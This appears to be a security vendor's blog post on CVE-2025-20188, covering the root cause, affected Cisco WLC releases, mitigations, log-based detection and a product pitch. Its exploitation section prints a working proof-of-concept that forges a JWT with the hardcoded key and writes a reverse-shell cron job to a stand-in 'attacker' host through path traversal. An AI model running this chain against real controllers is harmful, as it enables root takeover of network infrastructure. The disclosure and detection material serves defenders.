On May 7, 2025, Cisco published advisory cisco-sa-wlc-file-uplpd-rHZG9UfC for CVE-2025-20188, an unauthenticated arbitrary file upload vulnerability in IOS XE Wireless LAN Controllers. The flaw has a maximum CVSS v3.1 score of 10.0 because exploitation requires no authentication, no user interaction, and yields code execution as root on the supervisor. The root cause is among the most embarrassing classes of bug a vendor can ship: a hardcoded JSON Web Token signing key baked into the controller's Out-of-Band AP image download service. Security researchers had been hunting for unauthenticated RCEs in WLC since the 2023 Catalyst 9800 disclosures, and this one rewards that effort.
What is the bug?
The WLC ships a feature called Out-of-Band Access Point Image Download. The idea is to let an AP fetch its operating image directly from the controller over HTTPS rather than relying on CAPWAP, which is useful in lossy WAN scenarios and during initial provisioning. The endpoint that accepts uploaded images authenticates incoming requests by verifying a JWT in the Authorization header. The vulnerability is that the secret used to sign and verify those tokens — notfound in early reports — was hardcoded into the binary and identical across every shipped image.
Once you know the signing key, you can mint your own JWT, present it to the upload endpoint, and convince the WLC that you are a legitimate access point. The next step is a path traversal in the filename parameter that lets you write your uploaded file anywhere on the filesystem the underlying Linux process can reach — which, because IOSd runs as root, is everywhere. Drop a script into a cron-watched path, or overwrite the supervisor's goldstrike initialization script, and you have full root code execution on the next reload (or sooner).
The vulnerability is CWE-321 (hardcoded cryptographic key) chained with CWE-22 (path traversal) and CWE-434 (unrestricted file upload). It is reachable over HTTPS on TCP/8443 when the Out-of-Band AP image download feature is enabled.
How is it exploited?
The exploit chain is trivially short. Within four days of disclosure a proof-of-concept circulated on Twitter and several offensive security shops published walkthroughs. A simplified version:
import jwt, requests
# Hardcoded HS256 signing key extracted from IOS XE WLC binary
SECRET = "notfound"
# Mint a token that the WLC believes belongs to a valid AP
token = jwt.encode({"sub": "AP", "iat": 0, "exp": 9999999999}, SECRET, algorithm="HS256")
# Upload a script with path traversal in the filename
payload = b"#!/bin/bash\nbash -i >& /dev/tcp/attacker/4444 0>&1\n"
files = {"file": ("../../../../etc/cron.d/pwn", payload)}
headers = {"Authorization": f"Bearer {token}"}
r = requests.post(
"https://wlc.target.example/ap-image/upload",
headers=headers,
files=files,
verify=False,
timeout=10,
)
print(r.status_code, r.text)
The malicious file lands in /etc/cron.d/ and the controller's cron daemon executes it on the next minute boundary, yielding a root reverse shell on the supervisor. Because the WLC speaks HTTPS to access points across the campus and frequently across the public internet for cloud-managed deployments, internet exposure of TCP/8443 is common.
Who is affected?
CVE-2025-20188 affects Cisco IOS XE WLC devices when the Out-of-Band AP Image Download feature is enabled. Affected hardware families include the Catalyst 9800-CL Cloud Wireless Controller, Catalyst 9800 Series Wireless Controllers, the Catalyst 9800 Embedded Wireless Controller on Catalyst 9300/9400/9500 switches, and the legacy WLC on certain 8540 controllers running IOS XE images.
Fixed releases: IOS XE 17.15.1, 17.12.4 and later, 17.9.7 and later. The 17.3 train is end-of-software-maintenance and does not receive a fix; operators must upgrade.
The default state of the feature matters. In factory-shipped images for Catalyst 9800-CL the feature is disabled by default; in many enterprise deployments operators enable it for branch sites where APs cannot reach a central image repository. Cisco's quick check is one line:
show running-config | include ap upgrade method
If the output includes ap upgrade method https, the feature is enabled and the device is exposed.
What does patching require?
Patching is a controller image upgrade and reload. WLC HA pairs can be upgraded with In-Service Software Upgrade (ISSU) to avoid client disconnects, but operators report that ISSU is unreliable on older 17.9 builds, so many fleets schedule a maintenance window.
The interim mitigation is to disable the feature entirely:
configure terminal
no ap upgrade method https
end
write memory
After this, APs fall back to CAPWAP image download, which is slower over WAN but not exploitable. Cisco PSIRT also recommends blocking inbound traffic to TCP/8443 from any network outside the AP management VLAN, which provides defense in depth even after patching.
How do you detect exploitation?
The vulnerability leaves clear forensic footprints. First, look in the WLC's nginx access log for POST requests to the AP image upload path with traversal characters:
grep -E 'POST.*/ap-image/upload.*\.\./' /var/log/nginx/access.log
Second, audit crontab -l -u root and /etc/cron.d/ for files that did not exist before May 2025. Third, on IOS XE the bash shell is accessible to the platform via request platform software system shell; check the bash history file for unexpected commands. Fourth, monitor for unexpected outbound TCP connections from the WLC management interface to non-Cisco addresses — the controller should almost never initiate outbound connections except to NTP, syslog, and Cisco SMART licensing.
A sigma rule for the access log signal:
title: Cisco WLC AP Image Upload Path Traversal
logsource:
product: cisco
service: wlc-nginx
detection:
selection:
method: POST
cs-uri-stem|contains: '/ap-image/upload'
cs-uri-query|contains: '../'
condition: selection
level: critical
Network-level detection at the perimeter firewall is more reliable: alert on any inbound connection to TCP/8443 on WLC management IPs from outside the AP subnet.
How Safeguard Helps
Safeguard's firmware SBOM pipeline parses Cisco IOS XE images and surfaces vulnerable WLC builds against CVE-2025-20188 the moment Cisco PSIRT publishes — customers received the finding before the federal KEV deadline window opened. Reachability analysis identifies controllers where the Out-of-Band AP image upload feature is configured and where TCP/8443 is exposed to untrusted networks, separating "vulnerable" from "vulnerable and reachable." Policy gates block deployment of any WLC image below the fixed baseline, and Griffin AI correlates the finding with active KEV exploitation telemetry to push high-confidence incidents to the top of the queue. For ASPM customers, Safeguard maps each WLC to the business unit and physical site it serves, so during the May 2025 fire drill incident responders did not have to maintain a separate inventory spreadsheet to know which controllers needed emergency change tickets.